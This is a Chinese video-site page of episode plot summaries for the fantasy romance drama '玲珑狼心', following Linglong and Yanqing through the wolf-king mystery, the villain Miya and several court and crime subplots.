玲珑为炎青上药,不小心再次触碰到他的心脏部位,导致狼隐被唤醒。“三人”之间发生争执引来神使,当门被打开的一瞬,炎青正压在玲珑身上。本以为逃过一劫,谁知地上的被褥成了破绽,倒是玲珑急中生智,假装与炎青吵架才骗走了神使。这次行动免不得需要狼隐配合,炎青将玲珑绑在柱子上,才算有机会与狼隐好好做个交易。“三人”达成协议,狼隐需随时配合玲珑行动,届时炎青便与她一起回南楚完成使命。当夜,未免分床而睡再次引起怀疑,玲珑只能妥协。只是虽同床而眠,玲珑坚持以三碗水放在床中,避免炎青过界。谁知反而是玲珑熟睡之时,数次险些将水打翻,惹得炎青一整晚都难以入眠,索性坐在床边一夜未睡。第二天起早,二人身上便起了红斑,连忙去神使报喜,期间一女子躲在门口暗中观察着他们。玲珑与炎青照旧入夜采药,那女子偷偷跟在身后自然逃不过炎青的耳朵,经询问才知这女人就是绣娘。原本与绣娘同居一室的小菊在进入山洞后不久,绣娘就在连接着山洞的小溪里看见小菊带血的衣服碎片。绣娘断定小菊已死,故而偷偷塞住鼻子,让已经出现的红斑渐渐褪去,才能保命至今。三人经过商议定下救人计划,第二天一早,炎青和玲珑就说服神使为他们举行婚礼。婚礼当天,玲珑负责触景生情想念父母,试探其他人是否有想要回家的念头。而炎青则以给玲珑惊喜为由,让神使下山为他购买许多烟花。炎青借口采花点缀新房,再次弄了许多草药。入夜后,所有人都在为他们举行婚礼,炎青也故意再次勾起众人对家人的思念。宴席上,炎青故意将神使灌醉,释放烟花一是为了圆满之前上元节,玲珑未曾看到烟花绚烂,二是为了释放信号弹不被发现。经过再次涂药后,二人身上长出红斑,成功潜入后山禁地。谁知见山神前还要沐浴更衣,二人思虑如何重新收藏随身携带的暗器药粉,因耽搁太久引来神使怀疑。玲珑别无他法,只得主动将炎青推入浴盆,本想借口忍不住男女房事才会耽搁,可女孩的矜持让她始终下不了决心。正在危机之时,狼隐实在受不了玲珑胆小,及时出现,并主动吻上炎青的唇,这才没让神使看出端倪。玲珑一路撒了许多药粉,并将嫁衣碎片丢入小溪之中。守在山洞外的绣娘眼见信号流出,立刻一把火烧了村子,以着火为由带着村民逃跑。可惜他们没跑多远,数位神使就将他们团团围住。山洞内,所谓神使终于出现,正是上次逃跑的弥亚。在经历一番仪式后,所有人如同被迷了神志,任由黑衣人将他们手腕割破。鲜血流入透明晶体之中,玲珑一看便知这是南楚异术。炎青一记暗器使出伤了弥亚,这才让众人恢复神志。村民做鸟兽散,弥亚也认出玲珑与炎青,两方就此打斗在一起。

玲珑狼心第11集剧情

炎青与弥亚缠斗在一起,玲和众村民在小狼的带领下与村中人汇合,遭遇神使等人追杀。瞳哥儿带着狼卫前来救援,谁知黑衣人放下断龙石,导致他们无路可进村。玲珑原本叫出狼隐相助占据上风,可随着时间拖延,狼隐越发无力。走投无路之下,玲珑调动体内神秘力量,只见她周身突然泛起白光,将断龙石摧毁,这才得以让狼卫前来救人。而弥亚在两个人黑衣人的掩护下,成功逃离,等炎青摆脱纠缠之后,玲珑早已昏迷不醒。弥萨尚未给出结论,炎玉就已经心慌意乱,他曾经见过玲珑使用些许神秘力量,就导致筋脉尽断的后果,此次更是凶多吉少。瞳哥儿带着狼卫从山洞里挖出许多尸体,全是往年被当成圣男圣女的孩子。据瞳哥儿检查发现,被神使泡在水缸里的灵草是从狼族武士身体里挖出来的。每个狼族之人体内都会有一棵灵草长在胎记里,也真是如此,狼族之人的体质才会更强于普通人。联系前后因果,炎青有理由相信,是弥亚在利用普通人养殖灵草,一旦成功后则杀人灭口,用灵草炼制灵丹。普通人自然无法承受灵草的力量,虽然会短暂拥有强大力量,但终究难逃一死,但弥亚显然不会在乎旁人性命。玲珑是否可安然无恙,全看今夜过后能否醒来。炎青趁着房中无别人,点了小蝉的穴道,趴坐在床边守着玲珑。自从山神事件后,小狼也跟随在玲珑身边,炎青与玲珑诉说各种,只盼她醒来,担忧之情溢于言表。好在,玲珑第二天一早便醒来,炎青却是不敢声张,先一步悄悄离开。炎青一夜诉情已入了玲珑的眼,只是玲珑实在不敢相信,昨夜为她担忧伤心又温柔的人是炎青。玲珑身体恢复,将之前应允的金疮药药方拱手相送,炎青也答应一个月内陪她去南楚。正巧炎公爷来信,需让炎青将弥亚案件来龙去脉上表清楚,众人也决定回城。在回城之前,弥萨竟然也主动要求与众人一起。原来弥亚与弥萨师出同门,二人关系颇好,可惜后来弥亚误入邪道,弥萨因感念往日旧情,一时心软才放弥亚一条生路。如今弥亚在外为非作歹,弥萨也后悔当初一念之仁,导致数人生命因此而死,才会主动要求与众人一同,将弥亚捉拿归案,也好清理门户。此间,炎青与玲珑依旧互相斗嘴,但感情却是日渐升温,炎玉心中也逐渐生出反感。回城途径一处树林,炎青嘴上不愿与玲珑同行,故意先一步回程,暗中却让瞳哥儿等人随行保护。瞳哥儿发现西冷村村民偷偷摸摸埋伏在树林中,为保险起见,才在炎玉等人面前现身。后来两方见面,误会解除,西冷村其实是为送行而来,只是之前愚昧,这才不敢光明正大现身。经过这个小插曲后,瞳哥儿继续带着狼卫在暗中保护,避免弥亚在途中埋伏。玲珑心中欢喜于炎青的细心和关心,可这样的笑容却刺痛了炎玉的心。

玲珑狼心第12集剧情

回城路上,炎青从未停止琢磨怎么和优柔解除婚约,毕竟婚约一天不解除,他就一天不能正大光明地追求玲珑,更不愿意让玲珑误会他是个浪荡子。炎青主动开口要求退婚,如果让人知道其中是玲珑使然,那么她在西厥的日子定是更加难熬。炎青思来想去,还是决定让优柔主动退婚。这日,优柔主动前来会见玲珑,众人错以为她又是为挑事而来,可她见了玲珑却突然下跪道歉。当优柔得知玲珑不顾自身安危,救下圣男圣女,便知玲珑有勇有谋,并非谗言献媚的小人。优柔更是主动提出,如若玲珑与炎青真心相爱,她可让爹爹主动退掉与炎青的婚约,成全二人。谁知玲珑却与炎青划清界限,并表示祝贺,优柔欢欢喜喜地离开了,却是愁坏了躲在屋梁上偷听的炎青。炎青特意让炎玉去告知优柔有关玲珑的英勇事迹,就是为了让优柔主动退婚,眼下计划失败,他就像斗败的公鸡。炎玉得知炎青心思,更是险些兄弟不合,好在弥萨以玲珑身体不适为由,阻止三人争执不休。玲珑回来后,身体一直虚弱,更是虚不受补,弥萨思来想去,也只有从内部调节方有机会。强身练武,这是弥萨给出的建议,而优柔自幼习武,又是女子,便是最佳人选,优柔费尽心思定制许多练武法子,可这些在狼隐看来都是花拳绣腿,她的出现也让优柔得知玲珑体内有两个意识。为了秘密不被暴露,二女只能同意炎青成为教官,这样既可以保住秘密,其二也能震住狼隐。优柔心疼玲珑进行强度高的训练,主动陪着她一起,一天下来,两个人皆是筋疲力尽,浑身酸痛。炎玉心中不忍,想要就此断了这样了训练,却被弥萨拦住,看来炎青虽然严格却并不是没有道理。玲珑忽然发现炎青又在梁上听墙角,等她出门拦住想要离开的炎青,又主动靠在他的肩头,明显就是一副隐狼的做派。隐狼是玲珑最为亲密和了解的人,她很清楚炎青在玲珑心里的特别,这也让炎青心中窃喜。一天天的训练,炎青虽然表面狠心,背地里自然是关心玲珑,只是不愿表露出来,只能弄好药膏之后让玄宇送去。玲珑与优柔一边想着怎么捉弄炎青,一边赞叹玄宇的药有多么好用。第二天,优柔与玲珑将训练用的木桩打松,可炎青示范之时依旧不受影响。之后二人在木桩中装了暗器,也无法伤到炎青分毫,反倒是玲珑与优柔因此吃了不少亏。最后,还是玲珑装中暑,让炎青关心则乱,成功将他吊在半空中。玲珑与优柔前脚刚走,炎青就被玄宇救下来,他也正好有理由给二女休息的机会。玲珑趁着炎青不在,前来看望小狼,在它的带领下,让玲珑发现一直为她研制膏药的原来就是炎青。炎青回来后,看着瞳哥儿等人窃喜模样,从他们口中得知玲珑已经去了后院小屋半个时辰,连忙跑去解释。可炎青这般心虚模样,反而更加让玲珑确定,桌上的膏药就是炎青的心意。

玲珑狼心第13集剧情

玲珑好不容易因为药膏,以及炎青凶恶嘴脸也是为了激励她们而心存感动,可当她得知炎青体贴之中,竟然还藏着将她们当作用来退婚的棋子,那点儿感动立马荡然无存。不论炎青怎么解释,玲珑也不愿入耳,只将他一而再地丢进水塘才算解气。一出闹剧完结,优柔主动前来寻玲珑帮忙查案。张木匠为劫财杀害粮店账房,优柔自幼缺失母爱,是奶娘许妈妈将她带大,许妈妈和张木匠是二十年好友,不信对方会杀人,才请优柔帮忙。优柔对查案自知不如玲珑,得对方同意帮忙后事事听从,非但舍弃贵重身份,还女扮男装在衙门弄了个秀才身份以助查案。二人来到牢房,张木匠一听她们是为自己翻案而来,激动之情溢于言表,并一再解释自己并非杀人凶手。案发当晚,张木匠是被李账房主动邀约见面,二人也的确发生争执,当张木匠离开后应别人邀约见面,回来就被人以杀人并意图潜逃抓捕。张木匠是否为凶手,他当晚去见了谁,必然十分重要,可是当玲珑二人相问时,张木匠竟然宁愿被当成凶手处斩,也不愿意透露对方身份。正在二人询问陷入僵局,炎青受优柔父亲所请,以特使的身份前来,目的是为让优柔知难而退,也不至于伤了父女情分,更是顾及优柔的自尊心。优柔自然不愿意轻易放弃,可目前不能暴露身份,身为秀才更不能出入繁华场合,无处可去的二人只得在张木匠家暂住。优柔自幼养尊处优,即便是她想干活,也会被教习嬷嬷教训,她心中也非常向往自由的生活。可是看着张木匠家到处都是蜘蛛网,房中更是简陋,难免有些不习惯。暂住在张木匠的一天,虽然优柔各种嫌弃房子不够干净漂亮,还要亲手打扫卫生弄得腰酸背痛,却并没有真正不高兴。因身份之故,不能时常下馆子,优柔只能跟在玲珑身边学习做饭,虽然卖相难看,但味道不错,也算很有天赋,让她心中满足。这或许是优柔过得最自在、最充实的一天,而躲在屋顶偷看她们的炎青和玄宇,眼神里露出了同样的神情。虽然玄宇与优柔接触并不算多,但优柔直爽的性格早已将他吸引。心思回到案件,玲珑忽然想到张木匠曾说他是受李账房邀约才见的面,这将是翻案的引线。玲珑和优柔来到李账房家打探消息,最终在李账房遗孀口中得知,案发当晚,李账房将军粮账簿带回家私自抄录,也确实是李账房主动邀约张木匠见面。然而当炎青带着官府的人前来后,李账房遗孀因担心李账房偷账簿的事情败露,自然不会再说出真相。破案关键在于军粮账簿,两女没有权利查看军粮账簿,玲珑只得带着优柔主动向炎青道歉,希望他可以帮忙调出账簿。炎青得知消息,自然会去调出军粮账簿,却并不打算交给两女。优柔本就是被迫前来低声下气,眼见求人不着,哪里还会再给炎青好脸色,倒是玲珑计从心生。当夜,玲珑为优柔把风,让她去炎青书房将账簿偷出,就算东窗事发,优柔也可装糊涂说是借书拿错。谁知炎青早已洞悉她们的想法,一早就带着一壶酒在府门外等着玲珑。

玲珑狼心第14集剧情

优柔潜入书房,自然与玄宇撞个正着,两相争斗,玄宇见优柔拿着自己送的短剑防身,心中欢喜。闲话两句,玄宇将军粮账簿拱手相送,惊得优柔意外之余,更是对他好感更深。炎青趁着四下无人,忽然与玲珑聊起许妈妈与张木匠早有情愫,实则是想要借机表白。可惜炎青磨磨唧唧得样子,着实让隐狼看不下眼,导致这场本就不怎么样的表白,变得更加失败。言归正传,炎青早已将军粮账簿检查过,并未发现其中有任何问题,倒是优柔一眼便看出其中猫腻。本该记录着拨给前线的军粮,却被改成了补给中巡卫的军粮,二者差价甚多,幕后之人也是为了赚取差价,从而偷梁换柱,以次充好。军粮账簿之中,远远不止这一处问题,炎青自幼在边军长大,自然不懂城中巡卫粮草供给。优柔父亲掌管整个西厥粮草,优柔从小耳濡目染,自然可以轻易看出其中问题所在。即能更改粮草账簿,又对李账房诸事了如指掌,自然只有粮行老板一人。玲珑与优柔第二天一早就去粮行试探老板,当得见老板听闻她们说起以蜀中米冒充宁化米,立刻惊得手中的米撒了一地。粮行老板这般作态等于是不打自招,两女高兴离开,偷偷关注二人的炎青一路保护,玄宇则偷偷跟踪粮行老板,发现他果然与当地官员勾结。炎青本想布置妥当,保护玲珑和优柔安全,可见玲珑前来带走小狼,便知她已有计划。当夜,玲珑与优柔假装不知情,二人上床休息后,果然有两个黑衣人前来刺杀。床板早已被玄宇帮忙改装,二女此时正躲在床底,等黑衣人以为事成离开后,身上必然沾有玲珑事先撒在屋子里的香粉。在小狼的帮助下,她们找到得却是黑衣人的尸体,而官员正带着粮行老板前来贼喊捉贼。可惜官员杀害黑衣人时,早已沾上香粉,而官员杀害粮行老板欲让其顶罪,更准备对已经表明身份的优柔下杀手。幸好炎青带着优柔父亲及时赶到,这件事才算告一段落,而优柔也趁机主动要求退婚。许妈妈在生命的最后一刻,与张木匠互诉衷情,更后悔白白浪费一生时光。这件事刺激着炎青的心,立刻便要求对玲珑下聘订婚,表面上将这件事解释成为助玲珑回南楚的权宜之计。炎玉虽有心阻止,可玲珑的病情刻不容缓,他也只得妥协。就在炎青决定对玲珑下聘的时候,最受刺激的人还属炎厥。炎厥从不相信炎青会不在乎爵位,他自以为的勾心斗角、卧薪尝胆十余年,到头来却是一场独角戏,这比输给炎青更显讽刺。炎厥在府中借酒消愁,此前他曾经要求手下四处寻访可以治疗多魂症之人,可以让狼隐完全占据玲珑的身体,他才能和喜欢的人在一起。如今,一个带着面具的黑衣人,自称是治疗多魂症的良医,对着炎厥施展南楚异术,瞬间控制了他的心性。尚不知情的炎青,早就与玲珑一起又在回南楚的路上,不断想要和她拉近距离。可玲珑完全不愿搭理炎青,更是故技重施,以书为界,谁也不准靠近对方,让炎青颇为无奈。

玲珑狼心第15集剧情

马车行至湖边,突然车轮损坏,导致车队不得不暂时停下,炎青在湖边准备了许多南楚地道糕点,仿佛是早有预谋的浪漫。玲珑心思聪明,一猜便知,再等小蝉确认后,故意让炎青去湖对岸取一朵蒲公英。炎青不惜弄得一身潮湿,用木头做成盒,将蒲公英放入其中,再回头见不到玲珑才知上当。炎青看着玲珑已经上车,仍旧嘴硬,但木盒里丝毫未损的蒲公英让玲珑露出欢喜笑容。一行人来到客栈,炎青本想动些心思与玲珑同住一屋,却反而遭到柴房的待遇。也亏得炎青机警,看着周遭气氛不对,其他客人怀里还有刀剑,便多了一份提防。正待炎青给玲珑送吃食时,两方争斗一触即发。众人好不容易摆脱围困,来到西冷村附近,为了不连累村民,他们一路上山来到当初圣男圣女暂时居住的村子。炎青为救玲珑,身中一箭,好不容易得来的机会,炎青自然要故作伤重,惹得玲珑担心之下竟哭出声来。炎青从未想过,玲珑竟然会为自己流泪,一时心中欢喜,即便被她责怪也心感满足。狼卫等人在周边巡逻,活捉一名追上来的杀手,一番威逼之下,竟然是炎厥派人前来追杀炎青。炎青感到难以接受,他已经放弃爵位,实在不明炎厥为何还要不顾兄弟之情,赶尽杀绝。相比之下,玲珑心思更为细腻,炎青越是不争,炎厥的自尊心就越是受挫,一时难以接受而起了杀心也并非不可能。正说着,优柔被黑衣人一路追杀来到此地,幸得玄宇巡逻路过救她一命。原来自从炎青离开之后,炎厥便趁着优柔与父亲去炎府赴约,将二老一并捉拿软禁,优柔也是走运才能逃出围困。据优柔所说,炎厥身边出现一个带着面具的术士,炎厥对他言听计从。可炎青听闻之后,却并未将此事放在心上,似乎这不过就是回趟家一样的简单问题,规劝众人不如好好休息一夜,再行返回救人。带玲珑睡下,炎青这才领着狼卫等人趁夜回去,并点下玲珑睡穴,让优柔与弥萨送她睡到南楚。炎青离开后,优柔心觉不妥,解开玲珑睡穴,再见炎青留下书信,玲珑明知回南楚才是最有利的选择,可她无法让炎青孤身犯险而坐视不管。炎青带兵驻扎城外,炎厥虽已经得到护符,却仍旧不敢对敌,倒是面具术士三言两语,将他放置在无路可退的位置。爵位世袭已经上交朝廷,一旦批复,炎厥就是名正言顺的公爷,而炎青则成了乱臣贼子。炎厥虽然有心顾念兄弟之情,可听从术士挑拨,认为此战退则死,他也别无选择。待术士退下后,优柔带着弥萨和被装在木箱正处于昏迷的玲珑前来,主动为炎厥带来继续,只要用玲珑牵制炎青,乃是必胜的局势。然而等玲珑被人抬下去,优柔却突然话锋一转,坦白之前所言所行皆是玲珑的计谋,不知究竟意欲何为。

玲珑狼心第16集剧情

优柔将玲珑嘱咐的计划尽数透露,并提醒炎厥需将弥萨与玲珑分开,才能更好的控制她。优柔不满玲珑抢走炎青,父亲的性命也掌握在炎厥手里,更主动要求与炎厥联姻,事成后恢复她父亲的官职。优柔的投降合情合理,嫉妒和仇恨在这一刻爆发。炎青听闻这一消息,心中根本一分也不相信,当晚就和玄宇一起潜入炎府会见优柔,谁知却遭遇埋伏。炎青会来也早就在优柔预料之中,伏兵也是她提醒炎厥安置,虽然此次没能抓住炎青,却让炎厥完全信任优柔。炎厥按照约定,将弥萨与两位父辈和炎玉关押在一起,自然也可为他们解开南楚异术。而玲珑这边也被软禁,面具术士故意在她面前提起伤心往事,勾引狼隐出现。狼隐一出,炎厥便是双眼发光,可对方却是一点也不想和他有任何关系。倒是玲珑苦口婆心的劝说,才让狼隐忍着性子对炎厥示好,就算有面具术士劝说他小心也无济于事。炎厥完全被狼隐吸引,对她便是言听计从也不为过。狼隐故意借着吃饭想要下药却没成功,却因听闻炎厥自幼只想做个木匠,可继承爵位是他已故母亲遗愿,他才会如此执着。狼隐忽然觉得炎厥也并非厌恶至极的人,拉着他一起喝酒,醉酒之下,炎厥轻易便将锁着护符的钥匙拿出来。眼见便要得逞,谁知炎厥竟突然色心大发强吻狼隐,导致狼隐将他压在地下一阵踢打,引来门外守卫。这下功亏一篑,狼隐假意晕倒,待房中无人之时,玲珑再让狼隐去勾引炎厥便是再无可能。狼隐更加厌恶炎厥,根本不愿再看见对方,玲珑别无他法,只能自己一遍遍学着狼隐的模样去接近炎厥。幸亏炎厥生性愚笨,即便玲珑完全没有半分像狼隐,也中计喝了下药的酒当场昏迷。玲珑成功偷得虎符,脱下衣服与炎厥睡在一起,假装与他曾做过苟合之事,气恼哭泣着回到自己的房间。面具术士虽然谨慎,可是炎厥看见虎符并未丢失,便再未多想。第二天,玲珑便主动提出亲自写书信一封,劝说炎青投降,只求留其性命。炎厥见玲珑是青白尽毁之下的决定,并未怀疑有他,倒是优柔恐防有炸,要求监督玲珑并亲自送去劝降书。待优柔到了炎青军营之中,将劝降书送上,炎青却不急看信,稍稍研究木盒之后,便从夹层里拿到真的虎符。原来优柔反水投降也在她们计划之中,就为让弥萨有机会救炎玉等人恢复神志,更能让虎符轻松落入炎青手中。炎青拿着虎符调动城中军队,以平叛为明攻打炎厥。玲珑书信之中,藏有旁人看不懂的暗语,意让炎青在攻打前一夜放烟花为号,好让他们里应外合,救出炎玉等人。烟花冲上天空,开出最美丽的样子,炎青知道玲珑除了需要信号之外,也是想要看到这烟花的美丽。炎青对着满天烟花起誓,一生定要与玲珑相守,不离不弃。

玲珑狼心第17集剧情

炎厥大势已去,面具术士便带着他的投降血书面见炎青,一言一行似乎只是意炎青打开降书一看。果不其然,炎青担忧炎厥情急之下对玲珑不利,打开降书的瞬间,便神情恍惚,陷入异术之中。玲珑这边并未知道炎青发生变故,依计与弥萨救出被关押的众人,暂时躲避在炎府仓库内。等优柔传来信息,大军因炎青迟迟不现身而按兵不动,可玲珑这边却没有时间再等,只能冒险突围。炎厥率人将玲珑等人团团围住,不论父亲母亲如何劝说,也都不为所动,在他心里执拗的认为,一旦投降便是以死谢罪的局面。炎公爷与优柔父亲只得共同抗敌,隐狼也再次现身。而炎青这边却突然现身炎府,看着隐狼杀得人事不知,只有杀戮将她的心占满,甚至连炎玉也不放过。炎青赶来看着狼隐亲手将父亲杀死,直到最后一人不剩,就连他也不是敌手。二人打斗中,炎青突然翻开隐狼衣服,发现她肩头并无胎记,这才从幻术中清醒。而军中所有人,包括玄宇在内皆中幻术,眼前的面具术士也面露惊恐,原来他就是消失不久的弥亚。只是炎青担忧玲珑和父亲安危,唯有放弥亚逃走,否则僵持下去,恐在乎之人将一个不剩。果不其然,炎厥等人被异术控制,发疯一般六亲不认的攻击,就连及时赶到的炎青也不是敌手。最终,还是玲珑不顾自身安危使用神秘力量,才一举将炎厥等人重伤,而炎厥在失去意识的最后一刻,最不忘对隐狼的爱。玲珑再次陷入昏迷,炎玉本是好心前来安慰炎青,可当他得知炎青与玲珑早已互相心生爱慕,便普通行尸走肉一般。炎玉已经中榜,他满心欢喜等着迎娶玲珑,可眼下便如同遭到背叛一般,让他内心充满仇恨,他也并不打算就此放弃玲珑。此间事了,炎厥从昏迷中醒来,心智却回到了六岁,满心都是成为木匠,为父亲做天下最厉害的武器。炎厥还记得亲娘嫌弃他胆小懦弱,他便记得要娶一个厉害的娘子便是,这也是他从心底喜欢狼隐的原因。之前,玲珑认出炎公爷身上所带玉佩,与炎青送她的一模一样,而炎公爷佩戴的玉佩泛着白雾才是真品。玉佩是炎青母亲所留之物,再加上亲眼看见玲珑使用狼王力量,当下便将她软禁在密室之中。原来炎青的母亲就是狼王,狼王力量受人觊觎,她为不连累孩子才会狠心离开,而炎公爷也是同样害怕让旁人得知炎青是狼王之子,才会对他疏离。眼下,玲珑身怀狼王力量,炎公爷认定她就是杀害炎青母亲的仇人。幸亏炎青及时赶到求情,加上弥萨证明狼王力量是被人强行传入玲珑体内,才让炎公爷不再下杀手。炎青与父亲约定,一个月内查出母亲死亡真相,否则炎公爷不但要杀玲珑复仇,更会挥兵南楚,为心爱之人报仇雪恨。事已定下,炎青便与玲珑再次以定亲名义回南楚,而一切事宜仍有玄宇负责。其实玄宇一直是炎公爷放在炎青身边,既起保护作用,同时也是监督,玄宇本以为炎青会不再信任自己,但十年的感情又岂会有假。

玲珑狼心第18集剧情

想要弄清楚当年真相,玲珑又为何会身怀狼王力量,唯有南楚王宫才能找到答案。在经历炎家主母一番嘘寒问暖和无微不至的准备,以及在半路为他们送行的炎玉后,玲珑便一言不发,就算炎青故意挑衅也无法勾起她的情绪。炎青深觉玲珑似有不妥之处,可想到很快要回去见到不疼惜自己的父亲,心情自然不会很好。炎青亦觉深究无用,便一路再次回到上次被伏击的客栈,暂时休息,玄宇也成功打探消息归来。地图之上有一处富商庄园,弥亚抢走的狼族铁盒在成为贡品之前,便是这个富商所有之物。狼族铁盒是炎青母亲所留之物,或许富商会知晓其中些许隐秘,炎青决定先行寻找富商打探情况。先行寻找富商虽然可打探情况不至被动,但也是炎青了解玲珑心情,尽量推迟或是转移她的注意力。自从玲珑知晓自身与狼王之死有关,再加上南楚与西厥本就是敌国,她更是愁绪满心。偏偏狼隐最看不得玲珑这副模样,也在心里打起别的注意,让她有些慌神。到了富商府中,却见对方严阵以待,各种机关暗器,可惜这些东西自然无法伤害炎青等人。经过询问才知,一群黑衣人先一步找上富商,同样意在狼族铁盒,今夜便是他们前来杀人之日。炎青与众人在府中暂住,其一是作为换取情报而保护富商,其二也是为抓住弥亚。待炎青等人埋伏好,却发现领头之人竟然是个女的,对方身中玲珑所撒迷醉,炎青与玲珑一路追到乐坊之中。玲珑假装炎青侍女,在女人成堆之中寻找目标,自然不容易,何况对方已经将衣服换下。为了找到黑衣人,炎青主动上台与众舞姬跳舞,惹得玲珑内心不快,她可以隐忍,但狼隐却是不愿。狼隐强行霸占身体,在炎青面前热舞,薄纱盖在二人头上,相互之间都可以感觉到对方的呼吸。狼隐装作玲珑的模样,对着炎青宣誓主权,着实让炎青有些沉醉,但他并没有因此迷乱心智,及时敲晕狼隐,以防再生事端。弥萨也不知狼隐为何可以变得能随意强行霸占身体主导权,只得先行给一副药,暂且调养身体。此药本该一次一半,小蝉已将药放入水中,可玲珑想着之前的暧昧,心中欢喜又害羞,根本没看到。在赶走小蝉之后,玲珑将剩下的一半药粉又放入水中,一饮而尽。玲珑刚刚睡下便入了梦,看着许多女人围着炎青,自认是在梦中也不必过于隐忍,索性将心思在梦中发泄干净。玲珑对着炎青各种强势表白,更是主动吻上对方的唇,而原本准备给她送吃食的炎青,也在这样的攻势之下“缴械投降”。玲珑吻得不够,将炎青紧紧抱在怀里,却不知她所言所行皆实实在在,所谓梦境恐怕是她眼前幻觉而已。直到小蝉将弥萨找来,玲珑才恢复神志,才发现炎青还闭着眼睛等着她的第二个吻。

玲珑狼心第19集剧情

炎玉特意向老师求来抚南副使的官职,奉命出使南楚帮衬玲珑,及时与炎青等人汇合。于玲珑而言,炎玉放弃大好前途,只为护她前往南楚实属大材小用,更希望对方不必在乎儿时誓言。正当炎玉想要与玲珑表明心迹之时,炎青突然前来打断二人谈话。杀手藏身之地已经找到,炎青与玄宇制定好突袭计划后,欲让狼卫实行具体行动,可炎玉却坚持让豹骑营主导这次行动。此次炎玉再次出现,整个人都散发着戾气,与往日气质有着天壤之别。这次行动,炎玉和炎青嘴上虽都是为对方着想,但实际却互不退让,唯有玲珑开口让双方共同配合,才能让他们各退一步。布防到位后,玲珑忽感心头不适,炎玉故意挡着炎青,暗中抢去照顾玲珑的机会。炎玉陪着玲珑一起回到马车,就连小蝉想要贴身照顾也无法如愿,谁知炎玉刚将小蝉打发出去买东西,他就被狼隐袭击晕倒在马车里。豹骑营副将与瞳哥儿发生争执,也不知是看不起边军,还是看不起身为狼卫的他们而已,根本不顾制定计划,一意孤行。杀手出现的那一刻,忽然响起一声狼啸,炎青等人一听便知是狼族示警信号。炎青等人不顾追赶杀手的豹骑营,反身去寻找示警之人,在街道转角发现昏迷不醒的玲珑。众人得知是狼隐为杀手示警,弥萨以催眠之术将狼隐唤出,可还不待说上什么话,狼隐就主动挣脱弥萨的催眠陷入昏睡,不论玲珑如何叫喊也再无用处。为了计划成功,炎玉将玲珑软禁在房中,他在乎的只有玲珑,甚至想要将狼隐置于死地。豹骑营将一众杀手包围在一处茅草屋内,待炎青等人前来时,里面却再无一人。炎青顺着脚印找到隐藏在干草里的密道,谁知狼隐却突然从密道中出来,幸亏炎青出手才没让她伤到狼卫。此事一出,炎玉将玲珑的屋子大门全部用木板封死,真正将她像犯人一样关押在屋子里。时至深夜,玲珑忽见狼隐为争夺身体控制权,从而想要杀死她,下意识开口向炎青求助。待眼睛睁开,玲珑才发现刚刚不过是噩梦一场,而炎青正守在她的身边。炎青自制一架可以载着人飞行的大风筝,带着玲珑在天空中肆意翱翔,俯瞰从未见过的美景。忽然失去平衡,玲珑遇到危险,狼隐再现,炎青才露出得逞的笑容。二人趁夜偷偷溜出来,使得炎玉心中嫉妒更甚,玲珑越是解释,就让炎玉感到她对自己的生分。众人再次找到杀手隐藏的地点,可玲珑突然感到不适,总觉得一旦抓住对方就会发生不好的事情。炎玉对狼隐有偏见,不愿听取玲珑的意见,倒是炎青展露出对玲珑的尊重,才让他因不愿落后炎青,从而愿意静下心来听玲珑的感觉。不久后,炎玉便带人将杀手首领抓住,并以她为诱饵引出其他杀手,意图瓮中捉鳖。计划非常顺利,只是狼卫和杀人互斗各有损伤,原本一直唯唯诺诺又胆小的富商,突然直起腰板。当弥亚带着手下挟持炎玉和玲珑出现后,众人才发现原来富商早于弥亚勾结。

玲珑狼心第20集剧情

原来富商就是黑袍组织的大管家,而炎青等人抓来的女杀手,其实是苍狼部落的首领。弥亚已经找到狼王之子炎青,也知晓玲珑体内藏着狼王能量,他好似已经胜券在握,想象着成为新任狼王,将曾经欺辱他的人都踩在脚下的畅快模样。可惜,正在弥亚做梦的时候,原本早该死伤的人尽数站起身,炎玉和玲珑也在狼卫的偷袭下成功逃脱束缚。原来之前在山洞之外,是玲珑孤身一人前入其中,与首领翎羽交谈得知真相。翎羽一直在追杀弥亚,而灵草是狼族之人的尸骸,翎羽将之抢回也是为了带回族中安葬。翎羽与弥亚之间有着不共戴天之仇,炎青等人其实一直被弥亚的人误导,欲让炎青和翎羽自相残杀,他再坐收渔翁之利。炎青与翎羽将计就计,引弥亚入局,眼见事情再无转圜,富商竟欲拔剑自刎,倒是弥萨突然出现,几招便将弥亚就地正法。往日是弥萨一而再,再而三地放过弥亚,才会让他害了许多人命,如今虽然再次出手牵引陈年旧伤,弥萨却甘之如饴,并打算与众人一同前往南楚。眼前事情暂了,翎羽在炎青口中再次确认其身份后才与之相认,她是狼王的侄女,自然也就是炎青的表妹。可惜开心的时刻转瞬即逝,狼族之人失去狼心,难以维系,翎羽此番入世也是为了找回狼心。炎青回想曾经,当狼隐出现时,玲珑身上便会出现狼族特有的胎记,而胎记便证明其中孕育着狼族灵草。往事种种,狼心必然就在玲珑体内,此番回到南楚,玲珑也郑重承诺会将狼心归还。富商在弥萨妙手之下苏醒,为保全自身性命,将弥亚留下的密室暂时拱手相送,并道出当年真相。据富商所说,曾经有一批人追杀狼王,走投无路之下,狼王被南楚发兵相救。狼王之后一直居住在南楚王宫相安无事,为表达谢意,狼王为南楚做下一件事。许久后,狼王以为危险不再,故而出了南楚王宫。谁知杀手并未放弃,并将狼王追杀至一处岩浆悬崖之边,导致狼王跳崖自杀而亡。炎青等人怀疑,狼王为表达谢意之事,便是将狼心留在玲珑体内。无论如何,狼王之死并非如他们担心那样,乃是南楚所害,玲珑和炎青也终于不必为此所困所扰。炎青将密室钥匙交给炎玉后,便带着玲珑和狼卫来到岩浆悬崖边祭拜狼王,更是将婚事真正就此定下。炎青让人将悬崖边一块石头包裹,让人将之和富商一同带回炎府,也算给了父亲一个交代。弥亚密室中,有着狼族武士身体剖析图、弱点,以及捕获狼族之人的办法,翎羽迫不及待将之销毁。炎玉更在密室之中找到南楚王室与弥亚来往书信,可惜其中是暗语交流,不论炎青与炎玉如何安慰,玲珑始终心中不安。深夜,玲珑忽然似看到狼王身受重伤,一直道歉的模样。心中难以释怀,玲珑趁夜再次来到密室,重新观察南楚王室留下的密信,满脸不可置信。这一幕,也正被炎玉在门外看得一清二楚。

影片评论

本站所有视频和图片均来自互联网收集而来,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至administratorx#gmail.com (我们会在3个工作日内删除侵权内容,谢谢。)

Copyright © 2019 觅觅网 icp123

电影

剧集

综艺

动漫

主演